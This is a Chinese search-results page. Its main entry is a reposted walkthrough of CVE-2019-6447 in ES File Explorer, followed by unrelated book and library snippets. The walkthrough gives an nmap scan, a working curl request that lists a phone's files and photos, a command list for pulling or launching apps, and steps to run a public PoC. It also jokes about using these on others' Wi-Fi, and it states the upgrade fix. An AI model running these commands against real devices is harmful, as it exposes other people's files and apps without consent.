精华内容
下载资源
问答
  • QuaggaJS是条形码扫描器完全用JavaScript编写支持实时的本地化和各种类型的条形码,如EAN,CODE 128,CODE 39,EAN 8,UPC-A,UPC-C,I2of5,2of5,CODE 93的解码, CODE 32和CODABAR 。 该库还能够使用...
  • 每次用户启动应用时都会启动http服务器,打开的本地端口为59777,直接访问会弹出权限被拒绝漏洞影响范围ES文件管理版本号4.1.9.7.4或者更低漏洞复现直接nmap扫描手机指定端口nmap 192.168.0.108 59777可以看到端口...

    ES文件管理器号称安卓文件管理器第一品牌,主动下载达3亿次,作者我也在用。
    每次用户启动应用时都会启动http服务器,打开的本地端口为59777,直接访问会弹出权限被拒绝
    ES文件管理器未授权访问漏洞——CVE-2019-6447
    漏洞影响范围
    ES文件管理器版本号4.1.9.7.4或者更低
    漏洞复现
    直接nmap扫描手机指定端口
    nmap 192.168.0.108 59777
    ES文件管理器未授权访问漏洞——CVE-2019-6447
    可以看到端口是已经开启的
    我们可以直接curl也可以进行复现
    curl命令:curl --header "Content-Type: application/json" --request POST --data '{"command":"listPics"}' http://192.168.0.108:59777
    listPics可以替换成想要使用的命令
    可用命令
    listFiles:列出所有文件
    listPics:列出所有的图片
    listVideos:列出所有视频
    listAudios:列出所有的音频文件
    listApps:列出所有已安装的应用
    listAppsSystem:列出所有系统应用
    listAppsPhone:列出所有电话应用程序
    listAppsSdcard:列出sdcard中所有的apk文件
    listAppsAll :列出所有已安装的应用(包括系统应用)
    getDeviceInfo:获取设备信息
    appPull :从设备中提取应用,需要包名称参数
    appLaunch:启动应用程序,需要包名称参数
    getAppThumbnail:获取应用程序的图标,需要包名称参数
    上处命令位置为包路径下的4.1.84class2.-dex2jar.jar\com\estrongs\android\f\a.class
    ES文件管理器未授权访问漏洞——CVE-2019-6447
    poc脚本
    git clone https://github.com/fs0c131y/ESFileExplorerOpenPortVuln
    pip install -r requirements.txt
    python poc.py --cmd listPics --ip 192.168.0.108(listPics也可以替换自己要使用的命令)
    {"name":"mmexport1546422097497.jpg", "time":"1/2/19 10:41:37 AM", "location":"/storage/emulated/0/tencent/MicroMsg/WeChat/mmexport1546422097497.jpg", "size":"38.80 KB (39,734 Bytes)", }(出现此内容为复现成功)

    更新最新版es文件管理器即可修复(低于4.1.9.9的版本需尽快升级为最新版)

    ps:配合linuxdeploy在手机上部署kali环境简直无敌,只需要蹭下网就odkk了

    转载于:https://blog.51cto.com/superwolf/2347574

    展开全文
  •  cc实例196 隐藏IE浏览的右键关联菜单   cc实例197 设置IE的默认主页   cc实例198 清空上网历史记录   7.3 文件控制   cc实例199 如何建立文件关联   cc实例200 控制光驱的自动运行功能   7.4...
  •  cc实例196 隐藏IE浏览的右键关联菜单   cc实例197 设置IE的默认主页   cc实例198 清空上网历史记录   7.3 文件控制   cc实例199 如何建立文件关联   cc实例200 控制光驱的自动运行功能   7.4...
  •  cc实例196 隐藏IE浏览的右键关联菜单   cc实例197 设置IE的默认主页   cc实例198 清空上网历史记录   7.3 文件控制   cc实例199 如何建立文件关联   cc实例200 控制光驱的自动运行功能   7.4...
  •  cc实例196 隐藏IE浏览的右键关联菜单   cc实例197 设置IE的默认主页   cc实例198 清空上网历史记录   7.3 文件控制   cc实例199 如何建立文件关联   cc实例200 控制光驱的自动运行功能   7.4...
  • 13.3.2 扫描服务器打开的端口 331 13.3.3 发送和接收数据 333 13.3.4 获得无线路由分配给手机的IP地址 334 13.3.5 设置Socket选项 335 13.4 服务端Socket 339 13.4.1 手机服务器的实现 339 13.4.2 利用...
  • 能够进行端口扫描,并连接串口,实现数据发送,错误显示,实现了4个整形数字与4个浮点数的调整,并且能够读取系统的原始数据,显示发送状态,且能够显示信号强弱,同时能够进行示波显示,调节显示间隔。...
  • android java原始位置基于位置的服务 使用智能手机RSSID进行基于位置的服务,以在收集的指纹位置的预先生成的地图上确定位置。 该项目包含用于LBS(基于位置的...BUG:LBS扫描器生成的XML需要手动修改,缺少根标记。
  • 沙盘运行

    2014-01-26 00:01:23
    投篮辅助 让投篮更准 中锋?三分不是问题 百分百中!! 【招】应届生,入职年薪5-10万 【有奖】嵌入式开发从业人员大调查 SAP D-Code大会最低折扣倒计时 2013年热门Android应用 Android 游戏教程:让人物动起来 跟...
  • 如何在手机上查看vue-cli构建的项目

    千次阅读 2018-06-13 15:19:39
    一:找到config文件夹下的index.js文件,打开后,将host的值改为你本地的ip,保存后重启项目二:输入ip和端口号打开项目三:将地址转为二维码(草料二维码生成,QQ浏览器等)注意:扫描后浏览器会有一个提示信息,...
    一:找到config文件夹下的index.js文件,打开后,将host的值改为你本地的ip,保存后重启项目


    二:输入ip和端口号打开项目


    三:将地址转为二维码(草料二维码生成器,QQ浏览器等)


    注意:扫描后浏览器会有一个提示信息,点击访问原网页就行了
    展开全文
  • 微信通源码+wap手机

    2015-08-06 17:27:51
    微信端口“重新绑定”会员存在泄漏用户资料BUG,本店已经独家修复。 2014.11.28:独家更新!!独创关注回复图文模式,同时兼容文本回复模式,两种模式后台可以随意切换!让您的微信变的与众不同,更多实用功能开发...
  • 用户可以查看“控制面板”的“系统设备管理器端口”,就会发现增加了一个新的“蓝牙通信端口(COM4)”,这就是虚拟串口号。在WINDOWS下可以使用“串口调试助手”等软件打开COM4进行通信,此时灯连续亮。注意串口...
  • 通过扫描QR码并在区块链上支付加密货币来使用手机钱包解锁视频 代理服务器 等等。 测试基于区块链的支付系统的注意事项 此存储库中有5个项目: 一,区块链 通过BlockChain付款解决方案在Visual Studio 2017+中启动...
  • NetX Pro 5.5.3.0.apk

    2019-04-11 16:39:48
    - 端口扫描器扫描使用的最常见端口。 - 主题可用。 - 可用语言:捷克语,德语,希腊语,英语,西班牙语,法语,意大利语,荷兰语,波兰语,葡萄牙语,俄语,土耳其语和中文。 专业版 - Traceroute显示从智能手机...
  • 快应用扫码安装

    千次阅读 2018-03-29 15:27:21
    打开cmd在项目的根目录 使用 npm run server指令生成HTTP的服务器IP和端口 以及一个二维码使用官方的快应用调试 扫描二维码即可在手机上快速开启快应用 注意提示信息 : 请确保手机与App Server处于相同网段...

    打开cmd在项目的根目录 使用 npm run server指令

    生成HTTP的服务器IP和端口 以及一个二维码

    使用官方的快应用调试器 扫描二维码即可在手机上快速开启快应用 

    注意提示信息 : 请确保手机与App Server处于相同网段

    展开全文
  • 远程控制项目

    2017-06-19 13:53:33
    手机端控制电脑端,分为鼠标控制、键盘控制、手机端...套接字连接:在手机端输入电脑端IP地址以及端口号进行连接 ,IP地址输入分为在自定义IP地址输入以及二维码扫描连接 蓝牙连接:扫描电脑蓝牙设备进行连接 响应

    由手机端控制电脑端,分为鼠标控制、键盘控制、手机端实时显示电脑界面、cmd命令控制(可以一键使得电脑关机、注销、打开画图板、打开资源管理器等)

    编写语言:

    • 客户端Android studio编写
    • 服务端 Eclipse上Java编写

    连接方式:

    • 套接字连接:在手机端输入电脑端IP地址以及端口号进行连接 ,IP地址输入分为在自定义IP地址输入以及二维码扫描连接
    • 蓝牙连接:扫描电脑蓝牙设备进行连接

    响应方式是Java上Robot类以及JNA编程
    二维码使用是Zxing框架
    Java端蓝牙是 bluecove框架

    展开全文
  • 我的开源项目 之 Android Scanner 简介

    千次阅读 2015-07-19 15:11:45
    概述:Android Scanner 闲来无事自己琢磨的小东西。现在的智能手机,平板设备的运算能力有了大幅的提高,想想除了沟通功能,...在智能设备上执行网络扫描算法,看看目标设备上有哪些端口可用,一个小小的便携的扫描器
  • Zxing库

    2015-11-26 16:34:00
    一.介绍  Zxing是一个开放的源码,用java实现的多种样式的1D/2D条码处理库,它包含了联系到其他语言的端口。Zxing可以实现手机的内置摄像头... 1.CaptureActivity :启动Activity,也就是扫描器  2.CaptureA...
  • 库有助于访问各种设备:串行端口,数据和语音调制解调器,条形码扫描器,人机接口设备(HID),蓝牙,USB,LPT,GSM,GPS等。 它为几乎任何分组数据协议的快速实现提供了解决方案。 它可以处理声音和语音。 库允许...
  • 今天给大家介绍的是一款名叫Armor的macOS Payload加密工具,Armor手机麻将外挂软件是一个功能强大的Bash脚本,通过它来创建的加密macOS Payload能够绕过手机麻将辅助扫描工具。 Armor介绍 Armor可以直接配合...
  • Controller 层处理手机号发送短信五. Service层六. Rabbitmq发送短信的监听_使用注解配置七. aliyun_短信服务msm_自己申请就好了 一. 配置文件和mapper扫描配置 # 服务端口 server.port=8204 # 服务名 spring....
  • Android 开发指南

    2012-05-14 17:48:01
    它通过扫描5555-5585之间的奇数号端口来搜索模拟器或手机,一旦发现adb守护进程,就通过此端口进行连接。需要说明的是,每一个模拟器或手机使用一对有序的端口,偶数号端口用于控制台连接,奇数号端口用于adb连接,...
  • IP Tools Premium 8.8.apk

    2019-04-18 20:28:05
    端口扫描程序 •DNS查找 •Whois - 提供有关网站及其所有者的信息 •路由器设置页面 •Traceroute •WiFi分析 •具有“我的IP”功能的IP地址 •连接日志 •IP计算器 •IP和主机转换 •还有更多...... WiFi...
  • 网上查到做法有两种 ...3 实际上我的电脑无响应的原因是,usb端口接入了一个win10无法识别的设备(比如未信任连接的ipad、手机),我这里是ipad,一直连着,开关机后需要重新点信任,没点,重新插拔后解决 ...
  • #Photoshare v0.0.3与Nodejs,Expressjs进行简单的照片... 使用您的智能手机扫描QR码并访问发件人工具。 ## 2。 实时分享 共享照片将立即出现。 接收者什么也不做,只能访问 数据传输速率取决于网络和设备CPU的带宽。
  • CVE-2020-12753-LG 智能手机任意代码执行漏洞 CVE-2020-12695-UPnP 安全漏洞 79款 Netgear 路由器遭远程接管0day dlink-dir610-exploits-Exploits for CVE-2020-9376 and CVE-2020-9377 wacker:一组脚本,可辅助对...
  • 大蜘蛛手机全面保护版包含扫描仪、来电和短信过滤、防盗、URL过滤、安全审计、防火墙等组件。 安卓版大蜘蛛防病毒软件 Dr.Web Security Space PRO 中文版安卓版大蜘蛛防病毒软件 Dr.Web Security Space PRO ...
  • 第三篇入侵剖析与反入侵技术,包括第6章和第7章,主要阐述了服务器渗透攻防,如信息收集、扫描器、浏览器端攻防技术等。第四篇后门和远程控制,包括第8章和第9章,主要剖析了蠕虫和后门及其免杀的危害性,并给出防范...
  • Cloud Checker过滤将限制对不受欢迎的Internet站点的访问。根据几个类别(毒品,暴力等)阻止访问非推荐或潜在危险的网站。 安全审核员 •对设备进行故障排除以识别安全问题并提供解决方案。 火墙 控制应用程序...

空空如也

空空如也

1 2 3 4 5 6
收藏数 112
精华内容 44
关键字:

手机端口扫描器